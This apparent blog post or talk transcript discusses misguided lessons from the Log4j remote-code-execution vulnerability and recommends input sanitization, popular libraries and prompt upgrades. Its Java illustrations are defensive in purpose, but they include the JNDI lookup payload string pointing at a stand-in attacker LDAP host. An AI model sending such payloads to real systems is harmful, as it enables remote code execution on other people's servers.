Don Brown
December 16th, 2021
The wrong lessons to learn from the Log4j vulnerability
This feature allows you to include textual data in a log string. Specifically, you could use JNDI URLs. JNDI is a Java directory API, so you could use it to pull user attributes, such as a user's email address, into your log messages. If log messages are written by a developer, no problem, but the reality is that people often take user input and log it directly, exposing this feature to whoever supplies that input. The kicker, however, is the remote execution part. The response to a JNDI call could be a serialized object, and then Java would helpfully decide to deserialize it for you, including executing things like constructors. So basically, it allows the attacker to run any code they want on your system.
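To make the pattern concrete, here is a minimal sketch in plain Java. It is not Log4j's code: the `LookupDemo` class, its `render` method, and the two resolvers are hypothetical stand-ins, and the "jndi" resolver only returns a marker string instead of making a network call. What it shows is that when lookups are expanded on the final message, any user input spliced into that message gets expanded too.

```java
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class LookupDemo {
    // Matches ${prefix:key}, a simplified stand-in for lookup syntax.
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{(\\w+):([^}]*)\\}");

    // Hypothetical resolvers. A real JNDI resolver would contact a remote server here.
    private static final Map<String, Function<String, String>> RESOLVERS = Map.of(
        "env", key -> "<value of env var " + key + ">",
        "jndi", key -> "<REMOTE LOOKUP of " + key + ">");

    // Expands lookups in the finished message, so user data inside it is expanded as well.
    public static String render(String message) {
        Matcher m = LOOKUP.matcher(message);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            Function<String, String> resolver = RESOLVERS.get(m.group(1));
            // Unknown prefixes are left untouched.
            String replacement = resolver == null ? m.group() : resolver.apply(m.group(2));
            m.appendReplacement(out, Matcher.quoteReplacement(replacement));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        // Attacker-controlled value, e.g. taken from an HTTP header.
        String userAgent = "${jndi:ldap://attacker.example/a}";
        System.out.println(render("Request from " + userAgent));
    }
}
```

The developer only meant to log a header, but the attacker's string is what decides which lookup runs and where it points.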
Now from this experience, people could be learning the wrong lessons, and I want to go through them one by one. First, the knee-jerk response to this, particularly for people who already might have this opinion, is don't use Java. Java is an old technology, it's brittle, it's slow, it's for big enterprises, and it has so many problems, and so if you don't use Java, then this kind of thing won't happen to you. But that couldn't be further from the truth. This vulnerability actually has very little to do with Java. It has to do with the library and the pattern, which could apply to any language, any library, in almost any situation. So don't let your distaste, as valid or invalid as that may be, blind you to the reality of this vulnerability and the real lessons it has to teach us. Security requires constant vigilance and isn't as simple as using one thing versus another.
Another wrong lesson to take away is to avoid popular libraries, like Log4j. The thinking goes, and there's a little bit of truth to this, that if it's something really common that everybody is using, and there's ever a problem in it, now we're all screwed. So the best way to avoid this is to avoid the common things and try to use little libraries that aren't very well known or don't have this wide adoption. But the bigger truth here is that we only know about the Log4j problem because it was a popular library.
Popular open source libraries are going to get a lot more attention from security researchers and from teams that are using them in production, and so a lot of their problems are going to be found a lot quicker than in a library that nobody uses. Because if nobody is using it, the security researchers aren't going to be bothered with trying to find vulnerabilities, because who cares? And let's face it, if you're importing a third party library, you're probably not going to go line by line through its code to see if there are any problems. You're just going to accept it and move on. So you're actually safer using more common libraries, such as Log4j.
Another wrong lesson: avoid enterprise libraries, and I should probably put this one in quotes, "enterprise libraries". The idea here is kind of right, in that what people consider an enterprise library is usually another way of saying a bloated, needlessly complicated library that just does way too many things that I don't care about, and so then they call that enterprise. Now there's some truth to this as well. When you're choosing a library, you should look at what feature set it provides and make sure that your needs are a good match for what the library provides. There is really no such thing as bad libraries or good libraries, there are only libraries that are more appropriate for your case and those that aren't. But remember, you are responsible for what you add to your project. Whether you write the code yourself or import a third party library, you are now responsible for that function and any vulnerabilities it contains.
I'm saving some of the worst lessons for last, and this is one of my least favorites: the lesson here is that backward compatibility is bad. The thinking goes that Log4j has this problem because they didn't want to remove the feature, in order to not negatively affect the 3% of their users that were using this JNDI lookup feature. And so therefore, we should throw the baby out with the bath water and libraries should be able to just evolve whenever they need, do all the right things as soon as possible, and who cares about backward compatibility. But that would've actually made the situation way worse.
Backward compatibility is huge in the security world because if your library has backward compatibility, that means you can upgrade it easily. And one of the number one ways to deal with these kinds of vulnerabilities, because let's face it, they're going to happen, is to be able to quickly upgrade to the fix when it comes out. But if a library didn't maintain backward compatibility, then it's going to be a pain in the ass to upgrade because you're going to have to fix all the different things that are broken.
So backward compatibility is certainly not an absolute, something you should always have. Sometimes you need to break it, just like Log4j did with this vulnerability when they removed the feature that caused it. But as a service provider that is using libraries, I want to be able to just drop in the new version and not have to think about what it's going to break. So backward compatibility is important, however, it is not an absolute.
And finally, my least favorite lesson that I've heard people take away from this is you know what? Screw it. I'm not going to use any libraries. I'm going to write it myself. Logging is a very simple thing, I'll just write my own library that allows me to log and allows me to filter and allows me to interpolate and allows me to direct logs to different places. No, no, no. Don't write things yourself. Don't write common library functions yourself. Don't write your own database object mapper. Don't write your own log library. Don't write your own web framework. I could go on and on.
If this is a common problem that many applications have and there are popular maintained open source answers to these problems, use those. Don't write your own. Now one could think, well, if I wrote my own library then I wouldn't be vulnerable to the Log4j issue. Maybe. Maybe. Do you have security researchers that are looking through all of your code to find problems? Probably not. And the problem with Log4j wasn't the fact that it was this big complicated library, it was that they were taking something that was meant for a developer and people were passing user provided data into it. So the library in a sense was being used for something that it wasn't built for. This is a problem that has nothing to do with whether it's a popular open source library or not. If you wrote your own, you'd have this exact same problem, except now you don't have anyone else looking into it to find those bugs, to make those improvements, to do the security analysis of it. You don't understand the cost that you will have to pay over the life cycle of your application.
So these are some things that I think people might be taking away from this experience, and I recommend you don't, and hopefully you understand why. There are three things though that I think are critical to take away from this experience. Number one, sanitize user input. This whole problem happened because of a lack of user input sanitization, and I do this myself. You take information from a user, you drop it into a log statement to make it easier for you to figure out what they were doing, and at that same time, you make yourself vulnerable. Now we already learned the danger of not sanitizing user input from SQL injection and from cross site scripting errors. I could go on and on, and this is another example of that. So the lesson is whenever you have user input in your system, always either sanitize it or be very, very careful what you send it to and how you use it.
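As a rough illustration of that first lesson, here is a small sketch of cleaning a user-supplied value before it goes into a log statement. The `LogSanitizer` class and its `sanitize` method are hypothetical names, not part of Log4j or any other library, and the rules it applies (breaking up `${` and replacing line breaks) are assumptions about what is worth neutralizing. It is no substitute for upgrading to a fixed library version.

```java
public class LogSanitizer {
    // Hypothetical helper: makes untrusted text safer to embed in a log message.
    public static String sanitize(String input) {
        if (input == null) {
            return "";
        }
        return input
            // Break every "${" so the text can no longer start a lookup expression.
            .replace("${", "$ {")
            // Replace line breaks so a user can't forge extra log lines.
            .replaceAll("[\\r\\n]", "_");
    }

    public static void main(String[] args) {
        String userAgent = "${jndi:ldap://attacker.example/a}\nFAKE LOG LINE";
        System.out.println("Request from " + sanitize(userAgent));
    }
}
```

Whether you clean the value like this or simply keep user data out of places that interpret it, the point is the same one as with SQL injection: decide deliberately what happens to untrusted text before it reaches something that might act on it.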
Number two, use popular libraries. Even though it seems like this is an anti-pattern, in that if I didn't use popular libraries I wouldn't be exposed to this, the fact that it was found and the fact that it was quickly fixed is a testament to the value of using a popular open source library that you can quickly upgrade. And that leads me to my final bit of lesson or wisdom, I guess you could say: keep your libraries up to date. Vulnerabilities are going to happen. It's a fact of life. There is just way too much code inside of a modern web application, or really any application, to try to know every single thing that's going on and never make mistakes.
Mistakes are going to happen, but what you can control is how you keep your libraries up to date. If you have a process of always keeping them up to date, then when a new vulnerability fix comes out, you can just quickly jump to that fix. It's going to be way easier. You should be able to upgrade libraries within hours, if not minutes, and that's the number one thing you can do to keep yourself secure. Vulnerabilities are going to happen, but you need to be able to fix them quickly when they do come up.
Hi, I'm Don, co-founder of Sleuth, the number one DORA metrics tracker, long time Java developer, and Apache Software Foundation member. Notable, because that's where Log4j lives. I stream on Twitch and I was discussing the Log4j vulnerability that came out recently, and it hit me that folks are learning the wrong lessons from this experience, and so this video is here to set the record straight. The Log4j vulnerability is a severe remote code execution vulnerability affecting basically the whole internet. Big companies like Amazon, Microsoft, Google, and IBM are all affected. There are many better videos on this, but in a nutshell, a popular Java library called Log4j has a feature that allows developers to easily add extra data into the log messages, and it was recently discovered to be vulnerable to remote code execution attacks.